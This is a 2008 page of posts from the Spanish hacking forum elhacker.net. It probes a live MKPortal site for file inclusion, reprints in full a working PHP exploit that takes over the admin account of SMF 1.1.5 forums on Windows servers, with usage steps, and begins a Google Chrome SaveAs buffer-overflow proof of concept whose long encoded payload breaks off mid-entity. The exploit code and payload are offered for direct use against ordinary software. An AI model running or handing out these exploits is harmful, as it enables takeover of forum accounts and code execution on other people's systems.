elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 [426] 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 ... 455
4251  Seguridad Informática / Nivel Web / Posible inclusión remota de archivos en MKPortal en: 7 Septiembre 2008, 20:24 pm
Estaba mirando el sitio oficial de mkportal y pude ver que para visualizar una sección utiliza inclusiones hacia el archivo con el nombre de la variable "show" + .php
Por ejemplo:
Código:
http://www.mkportal.es/mkportal/modules/docs/index.php?show=copyright

En realidad está haciendo una inclusión hacia:
Código:
http://www.mkportal.es/mkportal/modules/docs/content/copyright.php

En el cual no verifica si realmente puede ser incluido o existe aquella página como se ve en el siguiente ejemplo:
Código:
http://www.mkportal.es/mkportal/modules/docs/index.php?show=fuck
Citar
Warning: require_once(content/fuck.php) [function.require-once]: failed to open stream: No such file or directory in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Fatal error: require_once() [function.require]: Failed opening required 'content/fuck.php' (include_path='.:/usr/local/lib/php') in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Y si hacemos una petición GET directamente a un archivo nos resulta..
Código:
http://www.mkportal.es/mkportal/modules/docs/content/copyright.php
Citar
Fatal error: Class 'module' not found in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/content/copyright.php on line 6

Aumentando las probabilidades de una inclusión remota o talves solo local. Probé inyectando null bytes para evadir la extensión pero no fue posible, si ingresas un punto, slqsh o algún caracter que no sea número o letra te lo toma como nó válido, a exepción de un byte nulo como "%00" asi que el resto será solo cosa de imaginación.

REFERENCIA:
http://www.jccharry.com/fake/1.txt
4252  Seguridad Informática / Nivel Web / Re: Quieres ser admin en un foro SMF 1.1.5? en: 7 Septiembre 2008, 18:16 pm
Recuerda que solo funciona para SMF que esté montado en un servidor con windows debido a su limitación de la generación de números al azar con la función rand().

se usa mas masomenos así:
Código:
php ./smf.php www.foro.com / --userid=1

Donde se supone que el id 1 es el admin, puedes posicionar el mouse sobre el nick del admin de un foro y abajo te aparecerá el número de id en la variable "u" que por lo general es 1.

Lo que hace el exploit es un crackeo de la clave insegura que debuelve al resetear el password de alguien aprobechandose de la cantidad limitada por windows para generar tal código y por eso es que no funciona en foros que están montados sobre un servidor con Linux.

Citar
yan@yan-desktop:~/Escritorio$ php ./smf.php
---------------------------------------------------------------
SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)
(c)oded by Raz0r (http://Raz0r.name/)
---------------------------------------------------------------
USAGE:
~~~~~~
php ./smf.php [host] [path] OPTIONS

[host] - target server where SMF is installed
[path] - path to SMF

OPTIONS:
--userid=[value] (default: 1)
--username=[value] (default: admin)
examples:
php ./smf.php site.com /forum/
php ./smf.php site.com / --userid=2 --username=odmen
yan@yan-desktop:~/Escritorio$
4253  Seguridad Informática / Nivel Web / Quieres ser admin en un foro SMF 1.1.5? en: 7 Septiembre 2008, 04:57 am
El único inconveniente es que funciona para servidores que corren con Window$  :P (windows pwned!)

código:
Código
  1. <?php
  2. echo "---------------------------------------------------------------\n";
  3. echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)\n";
  4. echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
  5. echo "---------------------------------------------------------------\n";
  6.  
  7. if ($argc<3) {
  8.   echo "USAGE:\n";
  9.   echo "~~~~~~\n";
  10.   echo "php {$argv[0]} [host] [path] OPTIONS\n\n";
  11.   echo "[host] - target server where SMF is installed\n";
  12.   echo "[path] - path to SMF\n\n";
  13.   echo "OPTIONS:\n";
  14.   echo "--userid=[value] (default: 1)\n";
  15.   echo "--username=[value] (default: admin)\n";
  16.   echo "examples:\n";
  17.   echo "php {$argv[0]} site.com /forum/\n";
  18.   echo "php {$argv[0]} site.com / --userid=2 --username=odmen\n";
  19.   die;
  20. }
  21.  
  22. /**
  23. * Software site: http://www.simplemachines.org
  24. *
  25. * SMF leaks current state of random number generator through hidden input parameter `sc`
  26. * of the password reminder form:
  27. *
  28. * $_SESSION['rand_code'] = md5(session_id() . rand());
  29. * $sc = $_SESSION['rand_code'];
  30. *
  31. * Since max random number generated with rand() on win32 is 32767 and session id
  32. * is known an attacker can reverse the md5 hash and get the random number value.
  33. * On win32 every random number generated with rand() is used as a seed for the next
  34. * random number. So if SMF is installed on win32 platform an attacker can predict
  35. * all the next random numbers. When password reset is requested SMF uses rand()
  36. * function to generate validation code:
  37. *
  38. * $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
  39. *
  40. * So prediction of the validation code is possible and an atacker can set his
  41. * own password for any user.
  42. *
  43. * More information about random number prediction:
  44. * http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/
  45. *
  46. * More information about the behaviour of rand() on win32 (in Russian):
  47. * http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/
  48. */
  49.  
  50. ini_set("max_execution_time",0);
  51. ini_set("default_socket_timeout",10);
  52.  
  53. $host = $argv[1];
  54. $path = $argv[2];
  55.  
  56. for($i=3;$i<=$argc;$i++){
  57.   if(isset($argv[$i]) && strpos($argv[$i],"--userid=")!==false) {
  58.       list(,$userid) = explode("=",$argv[$i]);
  59.   }
  60.   if (isset($argv[$i]) && strpos($argv[$i],"--username=")!==false) {
  61.       list(,$username) = explode("=",$argv[$i]);
  62.   }
  63. }
  64.  
  65. if(!isset($userid))$userid="1";
  66. if(!isset($username))$username="admin";
  67.  
  68. $sess = md5(mt_rand());
  69. echo "[~] Connecting to $host ... ";
  70. $ock = fsockopen($host,80);
  71. if($ock) echo "OK\n"; else die("failed\n");
  72.  
  73. $packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n";
  74. $packet.= "Host: {$host}\r\n";
  75. $packet.= "Cookie: PHPSESSID=$sess;\r\n";
  76. $packet.= "Keep-Alive: 300\r\n";
  77. $packet.= "Connection: keep-alive\r\n\r\n";
  78.  
  79. fputs($ock, $packet);
  80.  
  81. while(!feof($ock)) {
  82.   $resp = fgets($ock);
  83.   preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out);
  84.   if(isset($out[1])) {
  85.       $md5 = $out[1];
  86.       break;
  87.   }
  88. }
  89.  
  90. if($md5) {
  91.   $seed = getseed($md5);
  92.   if($seed) {
  93.       echo "[+] Seed for next random number is $seed\n";
  94.   } else die("[-] Can't calculate seed\n");
  95. }
  96. else die("[-] Random number hash not found\n");
  97.  
  98. function getseed($md5) {
  99.   global $sess;
  100.   for($i=0;$i<=32767;$i++){
  101.       if($md5 == md5($sess . $i)) {
  102.           return $i;
  103.       }
  104.   }
  105. }
  106.  
  107. $sc = md5($sess . $seed);
  108. $data   = "user=".urlencode($username)."&sc=$sc";
  109. $packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n";
  110. $packet.= "Host: {$host}\r\n";
  111. $packet.= "Cookie: PHPSESSID=$sess;\r\n";
  112. $packet.= "Connection: close\r\n";
  113. $packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
  114. $packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
  115. $packet.= $data;
  116.  
  117. fputs($ock, $packet);
  118.  
  119. $resp='';
  120. while(!feof($ock)) {
  121.   $resp .= fgets($ock);
  122. }
  123.  
  124. if(preg_match("@HTTP/1.(0|1) 200 OK@i",$resp)===false) {
  125.   die("[-] An error ocurred while requesting validation code\n");
  126. }
  127.  
  128. if(strpos($resp,"javascript:history.go(-1)")!==false) {
  129.   die("[-] Invalid username\n");
  130. }
  131.  
  132. srand($seed);
  133. for($i=0;$i<6;$i++){
  134.   rand();
  135. }
  136. $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
  137. echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n";
  138. ?>
  139.  
  140. # milw0rm.com [2008-09-06]

Fuentes:
http://milw0rm.com/exploits/6392
http://www.jccharry.com/blog/2008/09/07/whk_vulnerabilidad-en-sistema-de-foros-smf-115-y-versiones-anteriores.html
4254  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 6 Septiembre 2008, 01:26 am
desbordamiento de la memoria y la ejecución arbitraria de código..

Código
  1. <!--
  2. This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator.
  3.  
  4. Here comes details :
  5.  
  6. We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this.
  7.  
  8. The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users’ systems.
  9.  
  10. To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
  11.  
  12. Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.
  13.  
  14. Discoverer : Le Duc Anh - SVRT - Bkis
  15. SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems…
  16.  
  17. Website : http://security.bkis.vn
  18. Mail : svrt[at]bkav.com.vn
  19. -->
  20.  
  21. &#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#6250